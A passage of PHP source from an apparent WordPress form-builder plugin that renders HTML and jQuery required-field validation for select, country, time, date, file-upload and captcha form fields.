                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }
              
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']) : max($param['w_field_label_size'], $param['w_size']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_choices']	= explode('***',$param['w_choices']);
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
              $param['w_choices_disabled']	= explode('***',$param['w_choices_disabled']);
              
			  if(isset($param['w_choices_value']))
				{
				   $param['w_choices_value'] = explode('***',$param['w_choices_value']);
				   $param['w_choices_params'] = explode('***',$param['w_choices_params']);	
				}
					
			  if(!isset($param['w_value_disabled']))
				   $param['w_value_disabled'] = 'no';
					
              $post_value = isset($_POST["counter".$form_id]) ? esc_html($_POST["counter".$form_id]) : NULL;
              
              $rep='<div type="type_own_select" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.($param['w_size']).'px; "><select id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" style="width: 100%"  '.$param['attributes'].'>';
            foreach($param['w_choices'] as $key => $choice)
					{
						if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
							$choices_labels =array();
							$choices_values = array();
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
							$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
							
							
							
							$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));
							$table = $label_table_and_column[0];
							$label_column = $label_table_and_column[1];
							if($label_column)
							{
								$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);				
							}	

							$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_value'][$key]));
							$value_column = $param['w_choices_disabled'][$key]=="true" ? '' : $value_table_and_column[1];

							if($value_column)
							{
								$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);
							}	

							$columns_count = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);
							if(array_filter($choices_labels) || array_filter($choices_values))
								for($k=0; $k<$columns_count; $k++)
								{
									$choice_label = isset($choices_labels[$k]) ? $choices_labels[$k] : '';
									$choice_value = isset($choices_values[$k]) ? $choices_values[$k] : ($param['w_choices_disabled'][$key]=="true" ? '' : $choice_label);
									if(!isset($post_value))
										$param['w_choices_checked'][$key]=(($param['w_choices_checked'][$key]=='true' && $k == 0) ? 'selected="selected"' : '');
									else
										$param['w_choices_checked'][$key]=($choice_value==htmlspecialchars($_REQUEST['wdform_'.$id1."_element".$form_id]) ? 'selected="selected"' : '');

									$rep.='<option value="'.htmlspecialchars($choice_value[0]).'" '.$param['w_choices_checked'][$key].'>'.$choice_label[0].'</option>';
												
								}		
						}
						else
						{
							if(!isset($post_value))
								$param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'selected="selected"' : '');
							else
								$param['w_choices_checked'][$key]=(htmlspecialchars($choice)==htmlspecialchars($_REQUEST['wdform_'.$id1."_element".$form_id]) ? 'selected="selected"' : '');
				
							$choice_value = $param['w_choices_disabled'][$key]=="true" ? '' : (isset($param['w_choices_value']) ? $param['w_choices_value'][$key] : $choice);
								
							$rep.='<option value="'.htmlspecialchars($choice_value).'" '.$param['w_choices_checked'][$key].'>'.$choice.'</option>';	
							
						}

					}
              $rep.='</select></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if( jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                    {
                      alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                      jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
                      old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                      x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                      jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                      jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                      return false;
                    }
                }
                ';		
              }
              break;
            }
            
            case 'type_country': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_countries','w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }

              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']) : max($param['w_field_label_size'], $param['w_size']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_countries']	= explode('***',$param['w_countries']);
              
              $post_value = isset($_POST["counter".$form_id]) ? esc_html($_POST["counter".$form_id]) : NULL;
              $selected='';
     
              $rep='<div type="type_country" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.$param['w_size'].'px;"><select id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" style="width: 100%;"  '.$param['attributes'].'>';
              foreach($param['w_countries'] as $key => $choice) {
                if(isset($post_value)) {
                  $selected = (htmlspecialchars($choice) == htmlspecialchars(isset($_POST['wdform_'.$id1."_element".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_element".$form_id])) : "") ? 'selected="selected"' : '');
                }
                $choice_value=$choice;
                $rep.='<option value="'.$choice_value.'" '.$selected.'>'.$choice.'</option>';
              }
              $rep.='</select></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                    {
                      alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                      jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
                      old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                      x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                      jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                      jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                      return false;
                    }
                }
                ';		
              }
              break;
            }
            
            case 'type_time': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_time_type','w_am_pm','w_sec','w_hh','w_mm','w_ss','w_mini_labels','w_required','w_class');
              $temp=$params;

              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              
              if($temp) {
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
            
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              $w_mini_labels = explode('***',$param['w_mini_labels']);

              $w_sec = '';
              $w_sec_label='';
            
              if($param['w_sec']=='1') {
                $w_sec = '<div align="center" style="display: table-cell;"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;:&nbsp;</span></div><div style="display: table-cell;"><input type="text" value="'.(isset($_POST['wdform_'.$id1."_ss".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_ss".$form_id])) : $param['w_ss']).'" class="time_box" id="wdform_'.$id1.'_ss'.$form_id.'" name="wdform_'.$id1.'_ss'.$form_id.'" onkeypress="return check_second(event, &quot;wdform_'.$id1.'_ss'.$form_id.'&quot;)" '.$param['attributes'].'></div>';
                
                $w_sec_label='<div style="display: table-cell;"></div><div style="display: table-cell;"><label class="mini_label">'.$w_mini_labels[2].'</label></div>';
              }

              if($param['w_time_type']=='12') {
                if((isset($_POST['wdform_'.$id1."_am_pm".$form_id]) ? esc_html($_POST['wdform_'.$id1."_am_pm".$form_id]) : $param['w_am_pm'])=='am') {
                  $am_ = "selected=\"selected\"";
                  $pm_ = "";
                }	
                else {
                  $am_ = "";
                  $pm_ = "selected=\"selected\"";                  
                }	
              
                $w_time_type = '<div style="display: table-cell;"><select class="am_pm_select" name="wdform_'.$id1.'_am_pm'.$form_id.'" id="wdform_'.$id1.'_am_pm'.$form_id.'" '.$param['attributes'].'><option value="am" '.$am_.'>AM</option><option value="pm" '.$pm_.'>PM</option></select></div>';
                
                $w_time_type_label = '<div ><label class="mini_label">'.$w_mini_labels[3].'</label></div>';              
              }
              else {
                $w_time_type='';
                $w_time_type_label = '';
              }
              $rep ='<div type="type_time" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';"><div style="display: table;"><div style="display: table-row;"><div style="display: table-cell;"><input type="text" value="'.(isset($_POST['wdform_'.$id1."_hh".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_hh".$form_id])) : $param['w_hh']).'" class="time_box" id="wdform_'.$id1.'_hh'.$form_id.'" name="wdform_'.$id1.'_hh'.$form_id.'" onkeypress="return check_hour(event, &quot;wdform_'.$id1.'_hh'.$form_id.'&quot;, &quot;23&quot;)" '.$param['attributes'].'></div><div align="center" style="display: table-cell;"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;:&nbsp;</span></div><div style="display: table-cell;"><input type="text" value="'.(isset($_POST['wdform_'.$id1."_mm".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_mm".$form_id])) : $param['w_mm']).'" class="time_box" id="wdform_'.$id1.'_mm'.$form_id.'" name="wdform_'.$id1.'_mm'.$form_id.'" onkeypress="return check_minute(event, &quot;wdform_'.$id1.'_mm'.$form_id.'&quot;)" '.$param['attributes'].'></div>'.$w_sec.$w_time_type.'</div><div style="display: table-row;"><div style="display: table-cell;"><label class="mini_label">'.$w_mini_labels[0].'</label></div><div style="display: table-cell;"></div><div style="display: table-cell;"><label class="mini_label">'.$w_mini_labels[1].'</label></div>'.$w_sec_label.$w_time_type_label.'</div></div></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_mm'.$form_id.'").val()=="" || jQuery("#wdform_'.$id1.'_hh'.$form_id.'").val()=="" || (jQuery("#wdform_'.$id1.'_ss'.$form_id.'").length != 0 ? jQuery("#wdform_'.$id1.'_ss'.$form_id.'").val()=="" : false))
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_hh'.$form_id.'").focus();
                    return false;
                  }
                }
                ';
              }
              break;
            }

            case 'type_date': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_date','w_required','w_class','w_format','w_but_val');
              $temp = $params;
			  if(strpos($temp, 'w_disable_past_days') > -1)
				$params_names = array('w_field_label_size','w_field_label_pos','w_date','w_required','w_class','w_format','w_but_val', 'w_disable_past_days');

              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
                
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
            
			  $param['w_disable_past_days'] = isset($param['w_disable_past_days']) ? $param['w_disable_past_days'] : 'no';
			  $disable_past_days = $param['w_disable_past_days'] == 'yes' ? 'true' : 'false';
              $param['w_date']=(isset($_POST['wdform_'.$id1."_element".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_element".$form_id])) : $param['w_date']);

              $rep ='<div type="type_date" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';"><input type="text" value="'.$param['w_date'].'" class="wdform-date" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" maxlength="10" '.$param['attributes'].'><input id="wdform_'.$id1.'_button'.$form_id.'" class="wdform-calendar-button" value="'.$param['w_but_val'].'" format="'.$param['w_format'].'" onclick="return showCalendar(\'wdform_'.$id1.'_element'.$form_id.'\' , \''.$param['w_format'].'\', '.$disable_past_days.')" '.$param['attributes'].' ></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                    return false;
                  }
                }
                ';		
              }
			  
			  if($disable_past_days == 'true') {
                $check_js.='
                var currentDate = new Date();
				if( Date.parse(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val() + " 23:59:59") < currentDate.getTime() ) {
					alert("'.__('You cannot select former dates. Choose a date starting from the current one.', 'form_maker').'");
					return false;
				}
				';		
              }
              break;
            }

            case 'type_date_fields': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_day','w_month','w_year','w_day_type','w_month_type','w_year_type','w_day_label','w_month_label','w_year_label','w_day_size','w_month_size','w_year_size','w_required','w_class','w_from','w_to','w_divider');              
              $temp = $params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              
              $param['w_day']=(isset($_POST['wdform_'.$id1."_day".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_day".$form_id])) : $param['w_day']);
              $param['w_month']=(isset($_POST['wdform_'.$id1."_month".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_month".$form_id])) : $param['w_month']);
              $param['w_year']=(isset($_POST['wdform_'.$id1."_year".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_year".$form_id])) : $param['w_year']);
                
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	            
      
              if($param['w_day_type']=="SELECT") {
                $w_day_type = '<select id="wdform_'.$id1.'_day'.$form_id.'" name="wdform_'.$id1.'_day'.$form_id.'" style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].'><option value=""></option>';                
                for($k=1; $k<=31; $k++) {                
                  if($k<10) {
                    if($param['w_day']=='0'.$k) {
                      $selected = "selected=\"selected\"";
                    }
                    else {
                      $selected = "";
                    }
                    $w_day_type .= '<option value="0'.$k.'" '.$selected.'>0'.$k.'</option>';
                  }
                  else {
                    if($param['w_day']==''.$k) {
                      $selected = "selected=\"selected\"";
                    }
                    else {
                      $selected = "";
                    }
                    $w_day_type .= '<option value="'.$k.'" '.$selected.'>'.$k.'</option>';
                  }
                }
                $w_day_type .= '</select>';
              }
              else {
                $w_day_type = '<input type="text" value="'.$param['w_day'].'" id="wdform_'.$id1.'_day'.$form_id.'" name="wdform_'.$id1.'_day'.$form_id.'" style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].'>';
                $onload_js .='jQuery("#wdform_'.$id1.'_day'.$form_id.'").blur(function() {if (jQuery(this).val()=="0") jQuery(this).val(""); else add_0(this)});';
                $onload_js .='jQuery("#wdform_'.$id1.'_day'.$form_id.'").keypress(function() {return check_day(event, this)});';
              }
              if($param['w_month_type']=="SELECT") {              
                $w_month_type = '<select id="wdform_'.$id1.'_month'.$form_id.'" name="wdform_'.$id1.'_month'.$form_id.'" style="width: '.$param['w_month_size'].'px;" '.$param['attributes'].'><option value=""></option><option value="01" '.($param['w_month']=="01" ? "selected=\"selected\"": "").'  >'.(__("January", 'form_maker')).'</option><option value="02" '.($param['w_month']=="02" ? "selected=\"selected\"": "").'>'.(__("February", 'form_maker')).'</option><option value="03" '.($param['w_month']=="03"? "selected=\"selected\"": "").'>'.(__("March", 'form_maker')).'</option><option value="04" '.($param['w_month']=="04" ? "selected=\"selected\"": "").' >'.(__("April", 'form_maker')).'</option><option value="05" '.($param['w_month']=="05" ? "selected=\"selected\"": "").' >'.(__("May", 'form_maker')).'</option><option value="06" '.($param['w_month']=="06" ? "selected=\"selected\"": "").' >'.(__("June", 'form_maker')).'</option><option value="07" '.($param['w_month']=="07" ? "selected=\"selected\"": "").' >'.(__("July", 'form_maker')).'</option><option value="08" '.($param['w_month']=="08" ? "selected=\"selected\"": "").' >'.(__("August", 'form_maker')).'</option><option value="09" '.($param['w_month']=="09" ? "selected=\"selected\"": "").' >'.(__("September", 'form_maker')).'</option><option value="10" '.($param['w_month']=="10" ? "selected=\"selected\"": "").' >'.(__("October", 'form_maker')).'</option><option value="11" '.($param['w_month']=="11" ? "selected=\"selected\"": "").'>'.(__("November", 'form_maker')).'</option><option value="12" '.($param['w_month']=="12" ? "selected=\"selected\"": "").' >'.(__("December", 'form_maker')).'</option></select>';              
              }
              else {
                $w_month_type = '<input type="text" value="'.$param['w_month'].'" id="wdform_'.$id1.'_month'.$form_id.'" name="wdform_'.$id1.'_month'.$form_id.'"  style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].'>';
                $onload_js .='jQuery("#wdform_'.$id1.'_month'.$form_id.'").blur(function() {if (jQuery(this).val()=="0") jQuery(this).val(""); else add_0(this)});';
                $onload_js .='jQuery("#wdform_'.$id1.'_month'.$form_id.'").keypress(function() {return check_month(event, this)});';
              }
              if($param['w_year_type']=="SELECT") {
                $w_year_type = '<select id="wdform_'.$id1.'_year'.$form_id.'" name="wdform_'.$id1.'_year'.$form_id.'"  from="'.$param['w_from'].'" to="'.$param['w_to'].'" style="width: '.$param['w_year_size'].'px;" '.$param['attributes'].'><option value=""></option>';
                
                for($k=$param['w_to']; $k>=$param['w_from']; $k--) {
                  if($param['w_year']==$k) {
                    $selected = "selected=\"selected\"";
                  }
                  else {
                    $selected = "";
                  }
                  $w_year_type .= '<option value="'.$k.'" '.$selected.'>'.$k.'</option>';
                }
                $w_year_type .= '</select>';
              }
              else {
                $w_year_type = '<input type="text" value="'.$param['w_year'].'" id="wdform_'.$id1.'_year'.$form_id.'" name="wdform_'.$id1.'_year'.$form_id.'" from="'.$param['w_from'].'" to="'.$param['w_to'].'" style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].'>';
                $onload_js .='jQuery("#wdform_'.$id1.'_year'.$form_id.'").keypress(function() {return check_year1(event, this)});';
                $onload_js .='jQuery("#wdform_'.$id1.'_year'.$form_id.'").change(function() {change_year(this)});';
              }
              $rep ='<div type="type_date_fields" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';"><div style="display: table;"><div style="display: table-row;"><div style="display: table-cell;">'.$w_day_type.'</div><div style="display: table-cell;"><span class="wdform_separator">'.$param['w_divider'].'</span></div><div style="display: table-cell;">'.$w_month_type.'</div><div style="display: table-cell;"><span class="wdform_separator">'.$param['w_divider'].'</span></div><div style="display: table-cell;">'.$w_year_type.'</div></div><div style="display: table-row;"><div style="display: table-cell;"><label class="mini_label">'.$param['w_day_label'].'</label></div><div style="display: table-cell;"></div><div style="display: table-cell;"><label class="mini_label" >'.$param['w_month_label'].'</label></div><div style="display: table-cell;"></div><div style="display: table-cell;"><label class="mini_label">'.$param['w_year_label'].'</label></div></div></div></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_day'.$form_id.'").val()=="" || jQuery("#wdform_'.$id1.'_month'.$form_id.'").val()=="" || jQuery("#wdform_'.$id1.'_year'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_day'.$form_id.'").focus();
                    return false;
                  }
                }
                ';		
              }
              break;
            }

            case 'type_file_upload': {
              $params_names = array('w_field_label_size','w_field_label_pos','w_destination','w_extension','w_max_size','w_required','w_multiple','w_class');
              $temp = $params;
              foreach ($params_names as $params_name ) {
                $temp = explode('*:*'.$params_name.'*:*', $temp);
                $param[$params_name] = $temp[0];
                if (isset($temp[1])) {
                  $temp = $temp[1];
                }
                else {
                  $temp = '';
                }
              }
              if ($temp) {
                $temp	= explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp, 0, count($temp) - 1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");	
              $required = ($param['w_required']=="yes" ? true : false);	
              $multiple = ($param['w_multiple']=="yes" ? "multiple='multiple'" : "");
              $rep ='<div type="type_file_upload" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';"><label class="file-upload"><div class="file-picker"></div><input type="file" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_file'.$form_id.'[]" '.$multiple.' '.$param['attributes'].'></label></div></div>';
        
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                    return false;
                  }
                }
                ';	
              }
              $check_js.='
              if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
              {
                ext_available=getfileextension(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val(),"'.$param['w_extension'].'");
                if(!ext_available)
                {
                  alert("'.addslashes(__("Sorry, you are not allowed to upload this type of file.", 'form_maker')).'");
                  old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                  x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                  return false;
                }
              }
              ';
              break;
            }

            case 'type_captcha': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_digit','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              
              $rep ='<div type="type_captcha" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span></div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].'"><div style="display: table;"><div style="display: table-cell;vertical-align: middle;"><div valign="middle" style="display: table-cell; text-align: center;"><img type="captcha" digit="'.$param['w_digit'].'" src=" ' . add_query_arg(array('action' => 'formcontactwdcaptcha', 'digit' => $param['w_digit'], 'i' => $form_id), admin_url('admin-ajax.php')) . '" id="wd_captcha'.$form_id.'" class="captcha_img" style="display:none" '.$param['attributes'].'></div><div valign="middle" style="display: table-cell;"><div class="captcha_refresh" id="_element_refresh'.$form_id.'" '.$param['attributes'].'></div></div></div><div style="display: table-cell;vertical-align: middle;"><div style="display: table-cell;"><input type="text" class="captcha_input" id="wd_captcha_input'.$form_id.'" name="captcha_input" style="width: '.($param['w_digit']*10+15).'px;" '.$param['attributes'].'></div></div></div></div></div>';
              
              $onload_js .='jQuery("#wd_captcha'.$form_id.'").click(function() {captcha_refresh("wd_captcha","'.$form_id.'")});';
              $onload_js .='jQuery("#_element_refresh'.$form_id.'").click(function() {captcha_refresh("wd_captcha","'.$form_id.'")});';
              
              $check_js.='
              if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
              {
                if(jQuery("#wd_captcha_input'.$form_id.'").val()=="")
                {
                  alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                  old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                  x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                  jQuery("#wd_captcha_input'.$form_id.'").focus();
                  return false;
                }
              }
